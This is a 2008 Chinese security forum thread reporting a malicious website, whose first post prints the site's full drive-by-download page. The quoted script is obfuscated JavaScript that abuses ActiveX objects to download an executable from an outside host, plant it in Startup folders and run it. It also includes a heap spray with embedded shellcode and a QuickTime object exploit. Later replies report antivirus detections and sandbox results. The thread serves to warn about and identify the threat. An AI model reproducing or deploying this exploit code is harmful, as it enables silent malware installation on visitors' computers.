一个挂马网站 hxxp://www.aviews.net/

fireworld

<HTML><HEAD><TITLE>Load...</TITLE></HEAD><BODY>Loading...<div id=testobj></div>
<SCRIPT Language="javascript">
var space="";
function lsrn(pt31) {
var ldob=null; var tds1=17; var st2="2"; var stms="Microsoft"; var stmss="MS"; var stxml="XML"; var stdt="."; var stht="HTTP"; var stsrv="Server"; var url="http://avwav.com/_ioymsaxo/2993gitkkyia.exe"; var tds2=17; var stgt="GET"; var std="D"; var stbd="Body"; var strsp="response"; var ev1="ldob"+stdt+"open(stgt,url,false);"; var stsv="Save";
try { ldob=objmker(pt31, stms+stdt+stxml+stht); eval(ev1); } catch(e) { try { ldob=objmker(pt31, stmss+stxml+st2+stdt+stxml+stht); eval(ev1); } catch(e) { try { ldob=objmker(pt31, stmss+stxml+st2+stdt+stsrv+stxml+stht); eval(ev1); } catch(e) { try { ldob=new XMLHttpRequest(
); eval(ev1); } catch(e){ return 0; };};};};
try { ldob.send(null); } catch(e) { try { ldob.send(null); } catch(e) { return 0; };};
eval("ld"+stbd+"=ldob."+strsp+stbd);
var obj_strm=objmker(pt31, "A"+std+"O"+std+"B.Stream");
if (obj_strm) {
  obj_strm.Type=1; obj_strm.Mode=3; obj_strm.Open(); obj_strm.Write(ldBody);
  var hdrv=""; var dtemp=""; var dstart=""; var daustart="";
  try {var obj_WScript=objmker(pt31, "WScript.Shell");
   try{var wshProcEnv=obj_WScript.Environment("PROCESS"); hdrv=wshProcEnv("HOMEDRIVE"); dtemp=wshProcEnv("TEMP");}catch(e){};
   try{dstart=obj_WScript.SpecialFolders("Startup"); daustart=obj_WScript.SpecialFolders("AllUsersStartup");}catch(e){};
  }catch(e){};
  if (hdrv=="") { hdrv="C:"; };
  if (dtemp=="") { try { var obj_fso=objmker(pt31, "Scripting.FileSystemObject"); dtemp=obj_fso.GetSpecialFolder(2);}catch(e){};};
  var fn2=""; var fn=""; var stds="\\Documents and Settings\\"; var stau="All Users\\"; var stfln="\\msn_0805_upd270223.exe";
  var strnd=Math.round(Math.random()*(100000-1)+10000); var ev2="obj_strm."+stsv+"ToFile(fn,"+st2+");fn2=fn;";
  if(fn2==""){if(daustart!=""){try{Tv=daustart;fn=Tv+stfln;eval(ev2);}catch(e){};};};
  if(fn2==""){if(dstart!=""){try{Tv=dstart;fn=Tv+stfln;eval(ev2);}catch(e){};};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Inicio\\Programas\\Inicio"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menuen Start\\Programmer\\Start"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Start\\Programma\\'s\\Opstarten"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Start\\Programy\\Autostart"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Avvio\\Programmi\\Esecuzione automatica"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Kaynnista-valikko\\Ohjelmat\\Kaynnistys"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start Menu\\Programlar\\BASLANGIC"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start-meny\\Programmer\\Oppstart"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start-menyn\\Program\\Autostart"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Iniciar\\Programas\\Iniciar"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+"\\Dokumente und Einstellungen\\"+stau+"Startmenu\\Programme\\Autostart"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start Menu\\Programs\\Startup"+stfln;eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=dtemp;fn=Tv+"\\tmp"+strnd+".exe";eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+"\\sys"+strnd+".exe";eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+"\\RECYCLER\\"+strnd+".exe";eval(ev2);}catch(e){};};
  if(fn2==""){try{Tv=hdrv;fn=Tv+"\\RECYCLED\\"+strnd+".exe";eval(ev2);}catch(e){};};
  if (fn2!=""){try{var obj_shl=objmker(pt31,"Shell.Application");obj_shl.ShellExecute(fn2);}catch(e){try{obj_WScript.Exec(fn2);}
catch(e){
try{var tobjst=space; var obj2mk="testobj"+tobjst+".innerHTML"+tobjst+"=testobj"+tobjst+".innerHTML"+tobjst+"+\"<object"+tobjst+" classid"+tobjst+"='clsid:"+tobjst+"527196a4-b1a3-4647-931d-37ba5af23037"+tobjst+"' codebase="+tobjst+"'\"+fn2+\"'></"+tobjst+"object>\";";eval(obj2mk);}catch(e){return 0;};};};return 1;}else{return 0;};
}else{return 0;};
};

var tds=17; var i=0; var stcb1="-0000-0000-C000-000000000046"; var st1m="1-"; var stm1="-1";
var hncx=new Array("BD96C556-65A3"+stm1+"1D0-983A-00C04FC29E36","AB9BCEDD-EC7E-47E"+st1m+"9322-D4A210617116","0006F033"+stcb1,"0006F03A"+stcb1,"6E32070A-766D-4EE6-879C-DC1FA91D2FC3","6414512B-B978-451D-A0D8-FCFDF33E833C","7F5B7F63-F06F-433"+st1m+"8A26-339E03C0AE3D","06723E09-F4C2-43c8-8358-09FCD1DB0766","639F725F"+stm1+"B2D-483"+st1m+"A9FD-874847682010","BA018599"+stm1+"DB3-44f9-83B4-461454C84BF8","D0C07D56-7C69-43F"+st1m+"B4A0-25F5A11FAB19","E8CCCDDF-CA28-496b-B050-6C07C962476B",null);
var stob="object"; var stid="id"; var strd="obj_RDS"; var iuump=null;
while (hncx) {
iuump=null;iuump=document.createElement(stob);iuump.setAttribute(stid,strd+i);iuump.setAttribute("class"+stid,"cls"+stid+":"+hncx);
if(iuump){try{if(lsrn(iuump)){break;};}catch(e){};};
i++;
}

function objmker(pt21,pt22) {
var tds=27; var nobj=null; var stno="nobj=pt21.";
try{eval(stno+'CreateObject(pt22)');}catch(e){}
if(!nobj){try{eval(stno+'CreateObject(pt22,"")');}catch(e){}}
if(!nobj){try{eval(stno+'CreateObject(pt22,"","")');}catch(e){}}
if(!nobj){try{eval(stno+'GetObject("",pt22)');}
catch(e){}}
if(!nobj){try{eval(stno+'GetObject(pt22,"")');}catch(e){}}
if(!nobj){try{eval(stno+'GetObject(pt22)');}catch(e){}}
return(nobj);
}

function tuquiemfi(ptlrdawln, evghddnjz) {
while (ptlrdawln.length*2<evghddnjz){ptlrdawln+=ptlrdawln;}
ptlrdawln=ptlrdawln.substring(0,evghddnjz/2);
return ptlrdawln;
}
          
var itqgmcvli=0x0c0c0c0c;
var kjateykyc=unescape("%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2f3a%u612f%u7776%u7661%u632e%u6d6f%u5f2f%u6f69%u6d79%u6173%u6f78%u322f%u3939%u6733%u7469%u6b6b%u6979%u2e61%u7865%u0065%u0000");
var frckzkyeh=0x400000;
var mahdqpysh=kjateykyc.length * 2;
var evghddnjz=frckzkyeh - (mahdqpysh + 0x38);
var st90="";for(i=0;i<8;i++){st90=st90+"%u"+90+"90"};
var ptlrdawln=unescape(st90);
ptlrdawln=tuquiemfi(ptlrdawln,evghddnjz);
xrbgpsnic=(itqgmcvli-frckzkyeh)/frckzkyeh;
bzsperztn=new Array();
for(i=0;i<xrbgpsnic;i++){snwoiwoix=ptlrdawln+kjateykyc;bzsperztn=snwoiwoix;};

var tobjst2=space;var haveqt=false;var chkqt=' <sc'+'ript language="VB'+'script"> \n On Error Resume Next \n Set theObject=CreateObject("QuickTimeCheckObject.QuickTimeCheck.1") \n
On Error goto 0 \n If IsObject(theObject) Then \n If theObject.IsQuickTimeAvailable(0) Then \'Just check for file\' \n haveqt=1 \n End If \n End If \n </scr' + 'ipt> \n';
var obj1mk="document."+tobjst2+"writeln"+tobjst2+"(chkqt);";eval(obj1mk);
if (haveqt) { var obj2mk="document."+tobjst2+"write"+tobjst2+"('<"+tobjst2+"object"+tobjst2+" CLASSID"+tobjst2+"=\"clsid:"+tobjst2+"02BF25D5-8C17"+tobjst2+"-4B23-BC80-"+tobjst2+"D3488ABDDC6B\" width=\"100\" height=\"30\" style=\"border:0px\"><param name=\"src\" value=\"/play"+tobjst2+"list.mov\"><param name=\"auto"+tobjst2+"play\" value=\"true\"><param name=\"loop\" value=\"false\"><param name=\"controller\" value=\"true\"></"+tobjst2+"object>');"; eval(obj2mk);};
  
</SCRIPT>

</body>
</html>

fireworld

病毒        2008-06-21  11:36:59        C:\TDDOWNLOAD\2993gitkkyia.exe        Win32.Hack.Rootkit.du.147456        跳过，未处理

ssy275

冷冷

hXXp://avwav.com/_ioymsaxo/2993tgspivcx.htm
--->hXXp://avwav.com/_ioymsaxo/2993gitkkyia.exe


沙盘里好像没什么行为
├─D
│  └─WINDOWS
│      └─system32
│              ati2dva.dll
│              
└─I
    └─Temp



[ 本帖最后由 冷冷 于 2008-6-21 12:36 编辑 ]

hellobaby

进该网站红伞没有反应，也没有假死，冒似排除了。

电影结束了

E:\2993gitkkyia[1].rar>>2993gitkkyia[1].exe   Rootkit.Podnuha.du.bwpw 木马

14206937

我的也没反应

失翼天使

LinkScanner报了

zdlzp

原帖由 hellobaby 于 2008-6-21 12:34 发表
进该网站红伞没有反应，也没有假死，冒似排除了。

伞和畅游没报,可能排除

495228535

KIS6报了，傲游2.1直接卡死